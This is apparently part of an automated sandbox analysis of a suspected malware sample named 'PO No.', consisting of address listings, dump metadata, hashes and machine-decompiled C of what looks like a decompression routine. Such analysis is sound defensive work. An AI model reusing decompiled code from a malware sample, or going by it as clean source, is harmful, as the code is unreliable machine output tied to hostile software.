                                                                      0x00407119
                                                                      0x00407123
                                                                      0x00000000
                                                                      0x004070f6
                                                                      0x004070f6
                                                                      0x004070f9
                                                                      0x004070fd
                                                                      0x00407100
                                                                      0x00407103
                                                                      0x00407107
                                                                      0x00407107
                                                                      0x0040710a
                                                                      0x004071e4
                                                                      0x004071e4
                                                                      0x004071eb
                                                                      0x004071eb
                                                                      0x004071ee
                                                                      0x004071f5
                                                                      0x00407222
                                                                      0x00407226
                                                                      0x00407286
                                                                      0x00407289
                                                                      0x0040728e
                                                                      0x0040728f
                                                                      0x00407291
                                                                      0x00407293
                                                                      0x00407296
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x0040693e
                                                                      0x00406947
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00000000
                                                                      0x00406958
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406961
                                                                      0x00406964
                                                                      0x00406967
                                                                      0x0040696b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406971
                                                                      0x00406974
                                                                      0x00406976
                                                                      0x00406977
                                                                      0x0040697a
                                                                      0x0040697c
                                                                      0x0040697d
                                                                      0x0040697f
                                                                      0x00406982
                                                                      0x00406987
                                                                      0x0040698c
                                                                      0x00406995
                                                                      0x004069a8
                                                                      0x004069ab
                                                                      0x004069b7
                                                                      0x004069df
                                                                      0x004069e1
                                                                      0x004069ef
                                                                      0x004069ef
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069e3
                                                                      0x004069e6
                                                                      0x004069e7
                                                                      0x004069e7
                                                                      0x00000000
                                                                      0x004069e3
                                                                      0x004069bd
                                                                      0x004069c2
                                                                      0x004069c2
                                                                      0x004069cb
                                                                      0x004069d3
                                                                      0x004069d6
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069dc
                                                                      0x00000000
                                                                      0x004069f9
                                                                      0x004069f9
                                                                      0x004069fd
                                                                      0x004072a9
                                                                      0x00000000
                                                                      0x004072a9
                                                                      0x00406a06
                                                                      0x00406a16
                                                                      0x00406a19
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1c
                                                                      0x00406a1f
                                                                      0x00406a23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a25
                                                                      0x00406a2b
                                                                      0x00406a55
                                                                      0x00406a5b
                                                                      0x00406a62
                                                                      0x00000000
                                                                      0x00406a62
                                                                      0x00406a31
                                                                      0x00406a34
                                                                      0x00406a39
                                                                      0x00406a39
                                                                      0x00406a44
                                                                      0x00406a4c
                                                                      0x00406a4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a94
                                                                      0x00406a9a
                                                                      0x00406a9d
                                                                      0x00406aaa
                                                                      0x00406ab2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a69
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x004072b8
                                                                      0x00000000
                                                                      0x004072b8
                                                                      0x00406a79
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8a
                                                                      0x00406a8d
                                                                      0x00406a92
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407129
                                                                      0x00407129
                                                                      0x0040712f
                                                                      0x00407135
                                                                      0x0040713b
                                                                      0x00407155
                                                                      0x00407158
                                                                      0x0040715e
                                                                      0x00407169
                                                                      0x00407169
                                                                      0x0040716b
                                                                      0x0040713d
                                                                      0x0040713d
                                                                      0x0040714c
                                                                      0x00407150
                                                                      0x00407150
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407177
                                                                      0x0040717b
                                                                      0x0040732a
                                                                      0x00000000
                                                                      0x0040732a
                                                                      0x00407187
                                                                      0x0040718e
                                                                      0x00407196
                                                                      0x00407199
                                                                      0x0040719c
                                                                      0x0040719c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406aba
                                                                      0x00406abc
                                                                      0x00406abf
                                                                      0x00406b30
                                                                      0x00406b33
                                                                      0x00406b36
                                                                      0x00406b3d
                                                                      0x00406b47
                                                                      0x00000000
                                                                      0x00406b47
                                                                      0x00406ac1
                                                                      0x00406ac5
                                                                      0x00406ac8
                                                                      0x00406aca
                                                                      0x00406acd
                                                                      0x00406ad0
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad7
                                                                      0x00406adc
                                                                      0x00406adf
                                                                      0x00406ae2
                                                                      0x00406ae6
                                                                      0x00406aed
                                                                      0x00406af0
                                                                      0x00406af7
                                                                      0x00406afb
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406b03
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406afd
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00406b07
                                                                      0x00406b0a
                                                                      0x00406b28
                                                                      0x00406b2a
                                                                      0x00000000
                                                                      0x00406b0c
                                                                      0x00406b0c
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b17
                                                                      0x00406b1a
                                                                      0x00406b1d
                                                                      0x00406b1f
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406b23
                                                                      0x00000000
                                                                      0x00406d59
                                                                      0x00406d5d
                                                                      0x00406d7b
                                                                      0x00406d7e
                                                                      0x00406d85
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d91
                                                                      0x00406d94
                                                                      0x00406d96
                                                                      0x00406d9d
                                                                      0x00406d9e
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00406da6
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dae
                                                                      0x00000000
                                                                      0x00406dae
                                                                      0x00406d5f
                                                                      0x00406d62
                                                                      0x00406d65
                                                                      0x00406d6f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406dc3
                                                                      0x00406dc7
                                                                      0x00406dea
                                                                      0x00406ded
                                                                      0x00406df0
                                                                      0x00406dfa
                                                                      0x00406dc9
                                                                      0x00406dc9
                                                                      0x00406dcc
                                                                      0x00406dcf
                                                                      0x00406dd2
                                                                      0x00406ddf
                                                                      0x00406de2
                                                                      0x00406de2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e06
                                                                      0x00406e0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e10
                                                                      0x00406e14
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e1a
                                                                      0x00406e1c
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00406e27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e77
                                                                      0x00406e7b
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e88
                                                                      0x00406e92
                                                                      0x00000000
                                                                      0x00406e92
                                                                      0x00406e7d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406ea2
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eaf
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406ea4
                                                                      0x00406eb2
                                                                      0x00406eb5
                                                                      0x00406eb8
                                                                      0x00406eb8
                                                                      0x00406ebb
                                                                      0x00406ebe
                                                                      0x00406ec1
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ecb
                                                                      0x00406ed0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f5e
                                                                      0x00406f5e
                                                                      0x00406f62
                                                                      0x00407300
                                                                      0x00000000
                                                                      0x00407300
                                                                      0x00406f68
                                                                      0x00406f6b
                                                                      0x00406f6e
                                                                      0x00406f72
                                                                      0x00406f75
                                                                      0x00406f7b
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f7d
                                                                      0x00406f80
                                                                      0x00406f83
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00406b57
                                                                      0x004072c4
                                                                      0x00000000
                                                                      0x004072c4
                                                                      0x00406b5d
                                                                      0x00406b60
                                                                      0x00406b63
                                                                      0x00406b67
                                                                      0x00406b6a
                                                                      0x00406b70
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b72
                                                                      0x00406b75
                                                                      0x00406b78
                                                                      0x00406b78
                                                                      0x00406b7b
                                                                      0x00406b7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b84
                                                                      0x00406b8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b90
                                                                      0x00406b90
                                                                      0x00406b94
                                                                      0x00406b97
                                                                      0x00406b9a
                                                                      0x00406b9d
                                                                      0x00406ba0
                                                                      0x00406ba1
                                                                      0x00406ba4
                                                                      0x00406ba6
                                                                      0x00406bac
                                                                      0x00406baf
                                                                      0x00406bb2
                                                                      0x00406bb5
                                                                      0x00406bb8
                                                                      0x00406bbb
                                                                      0x00406bbe
                                                                      0x00406bda
                                                                      0x00406bdd
                                                                      0x00406be0
                                                                      0x00406be3
                                                                      0x00406bea
                                                                      0x00406bee
                                                                      0x00406bf0
                                                                      0x00406bf4
                                                                      0x00406bc0
                                                                      0x00406bc0
                                                                      0x00406bc4
                                                                      0x00406bcc
                                                                      0x00406bd1
                                                                      0x00406bd3
                                                                      0x00406bd5
                                                                      0x00406bd5
                                                                      0x00406bf7
                                                                      0x00406bfe
                                                                      0x00406c01
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c07
                                                                      0x00000000
                                                                      0x00406c0c
                                                                      0x00406c0c
                                                                      0x00406c10
                                                                      0x004072d0
                                                                      0x00000000
                                                                      0x004072d0
                                                                      0x00406c16
                                                                      0x00406c19
                                                                      0x00406c1c
                                                                      0x00406c20
                                                                      0x00406c23
                                                                      0x00406c29
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2b
                                                                      0x00406c2e
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c31
                                                                      0x00406c37
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c39
                                                                      0x00406c3c
                                                                      0x00406c3f
                                                                      0x00406c42
                                                                      0x00406c45
                                                                      0x00406c48
                                                                      0x00406c4b
                                                                      0x00406c4e
                                                                      0x00406c51
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c6f
                                                                      0x00406c72
                                                                      0x00406c75
                                                                      0x00406c78
                                                                      0x00406c78
                                                                      0x00406c7b
                                                                      0x00406c7f
                                                                      0x00406c81
                                                                      0x00406c59
                                                                      0x00406c59
                                                                      0x00406c61
                                                                      0x00406c66
                                                                      0x00406c68
                                                                      0x00406c6a
                                                                      0x00406c6a
                                                                      0x00406c84
                                                                      0x00406c8b
                                                                      0x00406c8e
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00000000
                                                                      0x00406c90
                                                                      0x00406c8e
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00406c95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cd0
                                                                      0x00406cd0
                                                                      0x00406cd4
                                                                      0x004072dc
                                                                      0x00000000
                                                                      0x004072dc
                                                                      0x00406cda
                                                                      0x00406cdd
                                                                      0x00406ce0
                                                                      0x00406ce4
                                                                      0x00406ce7
                                                                      0x00406ced
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cef
                                                                      0x00406cf2
                                                                      0x00406cf5
                                                                      0x00406cf5
                                                                      0x00406cfb
                                                                      0x00406c99
                                                                      0x00406c99
                                                                      0x00406c9c
                                                                      0x00000000
                                                                      0x00406c9c
                                                                      0x00406cfd
                                                                      0x00406cfd
                                                                      0x00406d00
                                                                      0x00406d03
                                                                      0x00406d06
                                                                      0x00406d09
                                                                      0x00406d0c
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d18
                                                                      0x00406d1b
                                                                      0x00406d33
                                                                      0x00406d36
                                                                      0x00406d39
                                                                      0x00406d3c
                                                                      0x00406d3c
                                                                      0x00406d3f
                                                                      0x00406d43
                                                                      0x00406d45
                                                                      0x00406d1d
                                                                      0x00406d1d
                                                                      0x00406d25
                                                                      0x00406d2a
                                                                      0x00406d2c
                                                                      0x00406d2e
                                                                      0x00406d2e
                                                                      0x00406d48
                                                                      0x00406d4f
                                                                      0x00406d52
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406d54
                                                                      0x00000000
                                                                      0x00406fe1
                                                                      0x00406fe1
                                                                      0x00406fe5
                                                                      0x0040730c
                                                                      0x00000000
                                                                      0x0040730c
                                                                      0x00406feb
                                                                      0x00406fee
                                                                      0x00406ff1
                                                                      0x00406ff5
                                                                      0x00406ff8
                                                                      0x00406ffe
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407000
                                                                      0x00407003
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406db1
                                                                      0x00406db1
                                                                      0x00406db4
                                                                      0x00407126
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071ad
                                                                      0x004071b1
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071cf
                                                                      0x004071d6
                                                                      0x004071dd
                                                                      0x00000000
                                                                      0x004071dd
                                                                      0x004071b3
                                                                      0x004071b6
                                                                      0x004071b9
                                                                      0x004071bc
                                                                      0x004071c3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040729e
                                                                      0x004072a1
                                                                      0x004071a2
                                                                      0x004071a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed8
                                                                      0x00406eda
                                                                      0x00406ee1
                                                                      0x00406ee2
                                                                      0x00406ee4
                                                                      0x00406ee7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406eef
                                                                      0x00406ef2
                                                                      0x00406ef5
                                                                      0x00406ef7
                                                                      0x00406ef9
                                                                      0x00406ef9
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f04
                                                                      0x00406f07
                                                                      0x00406f15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004071fa
                                                                      0x004071fa
                                                                      0x004071fe
                                                                      0x00407336
                                                                      0x00000000
                                                                      0x00407336
                                                                      0x00407204
                                                                      0x00407207
                                                                      0x0040720a
                                                                      0x0040720e
                                                                      0x00407211
                                                                      0x00407217
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x00407219
                                                                      0x0040721c
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x0040721f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f56
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407089
                                                                      0x00407089
                                                                      0x0040708c
                                                                      0x0040708e
                                                                      0x00407318
                                                                      0x00000000
                                                                      0x00407318
                                                                      0x00407094
                                                                      0x00407097
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040709d
                                                                      0x004070a1
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x00000000
                                                                      0x004070a4
                                                                      0x00406f22
                                                                      0x00406f24
                                                                      0x00406f26
                                                                      0x00406f28
                                                                      0x00406f2b
                                                                      0x00406f2c
                                                                      0x00406f2e
                                                                      0x00406f30
                                                                      0x00406f33
                                                                      0x00406f36
                                                                      0x00406f4c
                                                                      0x00406f51
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8d
                                                                      0x00406fb9
                                                                      0x00406fbb
                                                                      0x00406fc2
                                                                      0x00406fc5
                                                                      0x00406fc8
                                                                      0x00406fc8
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fcf
                                                                      0x00406fd2
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00407009
                                                                      0x00407009
                                                                      0x0040700c
                                                                      0x0040700f
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00000000
                                                                      0x00407083
                                                                      0x00407011
                                                                      0x00407017
                                                                      0x0040701a
                                                                      0x0040701d
                                                                      0x00407020
                                                                      0x00407023
                                                                      0x00407026
                                                                      0x00407029
                                                                      0x0040702c
                                                                      0x0040702f
                                                                      0x00407032
                                                                      0x0040704b
                                                                      0x0040704d
                                                                      0x00407050
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407056
                                                                      0x00407059
                                                                      0x0040705b
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407062
                                                                      0x00407065
                                                                      0x00407069
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040706c
                                                                      0x0040706f
                                                                      0x00407072
                                                                      0x00407034
                                                                      0x00407034
                                                                      0x0040703c
                                                                      0x00407041
                                                                      0x00407043
                                                                      0x00407046
                                                                      0x00407046
                                                                      0x00407075
                                                                      0x0040707c
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707c
                                                                      0x00406f8f
                                                                      0x00406f92
                                                                      0x00406f94
                                                                      0x00406f97
                                                                      0x00406f9a
                                                                      0x00406f9d
                                                                      0x00406f9f
                                                                      0x00406fa2
                                                                      0x00406fa5
                                                                      0x00406fa5
                                                                      0x00406fa8
                                                                      0x00406fa8
                                                                      0x00406fab
                                                                      0x00406fb2
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb2
                                                                      0x00406f38
                                                                      0x00406f3b
                                                                      0x00406f3d
                                                                      0x00406f40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c9f
                                                                      0x00406c9f
                                                                      0x00406ca3
                                                                      0x004072e8
                                                                      0x00000000
                                                                      0x004072e8
                                                                      0x00406ca9
                                                                      0x00406cac
                                                                      0x00406caf
                                                                      0x00406cb2
                                                                      0x00406cb5
                                                                      0x00406cb8
                                                                      0x00406cbb
                                                                      0x00406cbd
                                                                      0x00406cc0
                                                                      0x00406cc3
                                                                      0x00406cc6
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e2a
                                                                      0x00406e2a
                                                                      0x00406e2e
                                                                      0x004072f4
                                                                      0x00000000
                                                                      0x004072f4
                                                                      0x00406e34
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e42
                                                                      0x00406e45
                                                                      0x00406e48
                                                                      0x00406e4b
                                                                      0x00406e4e
                                                                      0x00406e51
                                                                      0x00406e52
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e5a
                                                                      0x00406e5d
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e63
                                                                      0x00406e65
                                                                      0x00406e65
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070b1
                                                                      0x004070b4
                                                                      0x004070b7
                                                                      0x004070ba
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bf
                                                                      0x004070c2
                                                                      0x004070c5
                                                                      0x004070c8
                                                                      0x004070cb
                                                                      0x004070ce
                                                                      0x004070cf
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d4
                                                                      0x004070d7
                                                                      0x004070da
                                                                      0x004070dd
                                                                      0x004070e0
                                                                      0x004070e4
                                                                      0x004070e6
                                                                      0x004070e9
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x00406e68
                                                                      0x00406e68
                                                                      0x00000000
                                                                      0x00406e68
                                                                      0x004070e9
                                                                      0x0040731e
                                                                      0x00407340
                                                                      0x00407346
                                                                      0x00407348
                                                                      0x0040734f
                                                                      0x00407351
                                                                      0x00407358
                                                                      0x0040735c
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00407355
                                                                      0x00407355
                                                                      0x00000000
                                                                      0x00407355
                                                                      0x004071a2
                                                                      0x00407228
                                                                      0x0040722e
                                                                      0x00407231
                                                                      0x00407234
                                                                      0x00407237
                                                                      0x0040723a
                                                                      0x0040723d
                                                                      0x00407240
                                                                      0x00407243
                                                                      0x00407249
                                                                      0x00407262
                                                                      0x00407265
                                                                      0x00407268
                                                                      0x0040726b
                                                                      0x0040726f
                                                                      0x00407271
                                                                      0x00407272
                                                                      0x00407275
                                                                      0x0040724b
                                                                      0x0040724b
                                                                      0x00407253
                                                                      0x00407258
                                                                      0x0040725a
                                                                      0x0040725d
                                                                      0x0040725d
                                                                      0x0040727f
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x0040727f
                                                                      0x00000000
                                                                      0x004070f4

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                      • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                                      • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                      • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00406E06() {
                                                                      				unsigned short _t532;
                                                                      				signed int _t533;
                                                                      				void _t534;
                                                                      				void* _t535;
                                                                      				signed int _t536;
                                                                      				signed int _t565;
                                                                      				signed int _t568;
                                                                      				signed int _t589;
                                                                      				signed int* _t606;
                                                                      				void* _t613;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                      						L89:
                                                                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                      						L69:
                                                                      						_t606 =  *(_t613 - 0x58);
                                                                      						 *(_t613 - 0x84) = 0x12;
                                                                      						L132:
                                                                      						 *(_t613 - 0x54) = _t606;
                                                                      						L133:
                                                                      						_t532 =  *_t606;
                                                                      						_t589 = _t532 & 0x0000ffff;
                                                                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                      						if( *(_t613 - 0xc) >= _t565) {
                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                      							 *(_t613 - 0x40) = 1;
                                                                      							_t533 = _t532 - (_t532 >> 5);
                                                                      							 *_t606 = _t533;
                                                                      						} else {
                                                                      							 *(_t613 - 0x10) = _t565;
                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                      						}
                                                                      						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                      							L139:
                                                                      							_t534 =  *(_t613 - 0x84);
                                                                      							L140:
                                                                      							 *(_t613 - 0x88) = _t534;
                                                                      							goto L1;
                                                                      						} else {
                                                                      							L137:
                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                      								 *(_t613 - 0x88) = 5;
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                      							goto L139;
                                                                      						}
                                                                      					} else {
                                                                      						if( *(__ebp - 0x60) == 0) {
                                                                      							L171:
                                                                      							_t536 = _t535 | 0xffffffff;
                                                                      							L172:
                                                                      							return _t536;
                                                                      						}
                                                                      						__eax = 0;
                                                                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                      						0 | _t258 = _t258 + _t258 + 9;
                                                                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                      						L75:
                                                                      						if( *(__ebp - 0x64) == 0) {
                                                                      							 *(__ebp - 0x88) = 0x1b;
                                                                      							L170:
                                                                      							_t568 = 0x22;
                                                                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                      							_t536 = 0;
                                                                      							goto L172;
                                                                      						}
                                                                      						__eax =  *(__ebp - 0x14);
                                                                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      						if(__eax >=  *(__ebp - 0x74)) {
                                                                      							__eax = __eax +  *(__ebp - 0x74);
                                                                      						}
                                                                      						__edx =  *(__ebp - 8);
                                                                      						__cl =  *(__eax + __edx);
                                                                      						__eax =  *(__ebp - 0x14);
                                                                      						 *(__ebp - 0x5c) = __cl;
                                                                      						 *(__eax + __edx) = __cl;
                                                                      						__eax = __eax + 1;
                                                                      						__edx = 0;
                                                                      						_t274 = __eax %  *(__ebp - 0x74);
                                                                      						__eax = __eax /  *(__ebp - 0x74);
                                                                      						__edx = _t274;
                                                                      						__eax =  *(__ebp - 0x68);
                                                                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      						_t283 = __ebp - 0x64;
                                                                      						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                      						 *( *(__ebp - 0x68)) = __cl;
                                                                      						L79:
                                                                      						 *(__ebp - 0x14) = __edx;
                                                                      						L80:
                                                                      						 *(__ebp - 0x88) = 2;
                                                                      					}
                                                                      					L1:
                                                                      					_t535 =  *(_t613 - 0x88);
                                                                      					if(_t535 > 0x1c) {
                                                                      						goto L171;
                                                                      					}
                                                                      					switch( *((intOrPtr*)(_t535 * 4 +  &M0040735D))) {
                                                                      						case 0:
                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      							_t535 =  *( *(_t613 - 0x70));
                                                                      							if(_t535 > 0xe1) {
                                                                      								goto L171;
                                                                      							}
                                                                      							_t539 = _t535 & 0x000000ff;
                                                                      							_push(0x2d);
                                                                      							asm("cdq");
                                                                      							_pop(_t570);
                                                                      							_push(9);
                                                                      							_pop(_t571);
                                                                      							_t609 = _t539 / _t570;
                                                                      							_t541 = _t539 % _t570 & 0x000000ff;
                                                                      							asm("cdq");
                                                                      							_t604 = _t541 % _t571 & 0x000000ff;
                                                                      							 *(_t613 - 0x3c) = _t604;
                                                                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                      								L10:
                                                                      								if(_t612 == 0) {
                                                                      									L12:
                                                                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      									goto L15;
                                                                      								} else {
                                                                      									goto L11;
                                                                      								}
                                                                      								do {
                                                                      									L11:
                                                                      									_t612 = _t612 - 1;
                                                                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                      								} while (_t612 != 0);
